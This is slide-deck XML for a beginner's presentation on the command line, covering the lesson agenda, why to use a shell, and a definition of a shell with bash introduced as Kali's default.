          <p:cNvPr id="73" name="Google Shape;73;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="1323594"/>
            <a:ext cx="29489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What is a shell, really?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Google Shape;74;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1831086"/>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5" name="Google Shape;75;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="560710" y="1877446"/>
            <a:ext cx="263896" cy="263896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;76;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="1817370"/>
            <a:ext cx="29489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SSH and RDP</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Google Shape;77;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="2324862"/>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8" name="Google Shape;78;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="560710" y="2371222"/>
            <a:ext cx="263896" cy="263896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;79;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="2311146"/>
            <a:ext cx="29489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Basic bash navigation</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Google Shape;80;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="2818638"/>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1" name="Google Shape;81;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="560710" y="2864998"/>
            <a:ext cx="263896" cy="263896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;82;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="2804922"/>
            <a:ext cx="29489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What is virtualization?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="3312414"/>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4" name="Google Shape;84;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="560710" y="3358774"/>
            <a:ext cx="263896" cy="263896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="3298698"/>
            <a:ext cx="29489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AMD64 vs ARM64</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Google Shape;86;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="3806190"/>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7" name="Google Shape;87;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="560710" y="3852550"/>
            <a:ext cx="263896" cy="263896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="3792474"/>
            <a:ext cx="29489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Installing Kali, step by step</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4299966"/>
            <a:ext cx="356616" cy="356616"/>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90" name="Google Shape;90;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="560710" y="4346326"/>
            <a:ext cx="263896" cy="263896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="4286250"/>
            <a:ext cx="294894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Resources</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Google Shape;92;p16"/>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Agenda</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Google Shape;93;p16"/>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98" name="Shape 98"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Google Shape;99;p17"/>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STARTING AT THE BEGINNING</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p17"/>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Reasons to use the command line</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48006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2" name="Google Shape;102;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67208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03" name="Google Shape;103;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="732709" y="1658539"/>
            <a:ext cx="345095" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123444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It's exact</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;105;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="185166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One command does exactly one thing, every time. No menus to hunt through.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469773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07" name="Google Shape;107;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488975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08" name="Google Shape;108;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4950379" y="1658539"/>
            <a:ext cx="345094" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545211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It's automatable</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452110" y="185166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A command you can type, you can also save into a script and run 1,000 times.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;111;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48006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2" name="Google Shape;112;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67208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13" name="Google Shape;113;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="732709" y="3338749"/>
            <a:ext cx="345095" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123444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It's often all you get</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="353187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Most servers, cloud instances, and competition boxes have no GUI at all.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469773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17" name="Google Shape;117;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488975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18" name="Google Shape;118;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4950379" y="3338749"/>
            <a:ext cx="345094" cy="345094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545211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It works everywhere</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452110" y="353187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The same core commands work on your laptop, a server, and a competition VM.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p17"/>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Why the command line</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p17"/>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7" name="Shape 127"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p18"/>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DEFINITION #1</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;129;p18"/>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What is a shell?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1405890"/>
            <a:ext cx="4046220" cy="3360420"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 1633"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31" name="Google Shape;131;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1611630"/>
            <a:ext cx="514350" cy="51435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32" name="Google Shape;132;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="752666" y="1678496"/>
            <a:ext cx="380619" cy="380619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2228850"/>
            <a:ext cx="3634740" cy="102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0" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A shell is just a program. Its whole job is to read the text you type, figure out what command you mean, ask the operating system's kernel to run it, and print the result back to you.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3326130"/>
            <a:ext cx="363474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It's the middleman between you and the kernel. Nothing more mystical than that.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732020" y="1405890"/>
            <a:ext cx="39090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Shells you'll </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>encounter</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732020" y="1748790"/>
            <a:ext cx="3909060" cy="617220"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 8889"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37" name="Google Shape;137;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="1831086"/>
            <a:ext cx="10972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100"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="2057400"/>
            <a:ext cx="3566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default on most Linux distros, including Kali. "Bourne Again SHell."</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
